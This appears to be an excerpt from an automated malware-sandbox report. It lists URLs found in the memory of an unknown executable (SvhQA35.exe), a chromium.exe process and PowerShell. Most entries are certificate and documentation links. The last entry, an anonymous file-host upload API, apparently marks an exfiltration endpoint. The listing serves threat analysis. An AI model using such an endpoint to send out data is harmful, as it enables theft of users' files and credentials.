Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515319092.000001D127039000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: chromium.exe, 0000001B.00000003.2518013443.000001D126EFD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: chromium.exe, 0000001B.00000003.2524579985.000001D124AEB000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2526083941.000001D124AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl&
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlxyg
Source: chromium.exe, 0000001B.00000003.2518013443.000001D126EFD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlO0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crlv
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crles
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515319092.000001D127039000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518402059.000001D126F74000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2534285511.000001D12638C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/functools.html#functools.lru_cache.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://goo.gl/fmebo.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://goo.gl/zeJZl.
Source: chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542613082.000001D126C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://linuxdevcenter.com/pub/a/linux/2000/11/16/LinuxAdmin.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
Source: powershell.exe, 00000005.00000002.1711867660.000000000565A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1803490046.000001F331E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1803490046.000001F331CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543520230.000001D126EF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.esK
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000008.00000002.1770913315.000001F321E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: powershell.exe, 00000005.00000002.1708938905.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1770913315.000001F321C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://serverfault.com/a/417946
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://speleotrove.com/decimal/decarith.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542613082.000001D126C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517682930.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543520230.000001D126EF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543520230.000001D126EF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlRv
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm&
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543520230.000001D126EF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EDD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543520230.000001D126EF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: powershell.exe, 00000008.00000002.1770913315.000001F321E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518013443.000001D126EFD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: chromium.exe, 0000001B.00000003.2518013443.000001D126EFD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/v
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515319092.000001D127039000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AABF6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2518402059.000001D126F74000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/character-sets
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517030911.000001D126857000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2521921789.000001D12686D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: chromium.exe, 0000001B.00000003.2518639110.000001D126EBF000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517682930.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000008.00000002.1770913315.000001F321C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1708938905.00000000045F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: chromium.exe, 0000001B.00000003.2483933287.000001D12777C000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
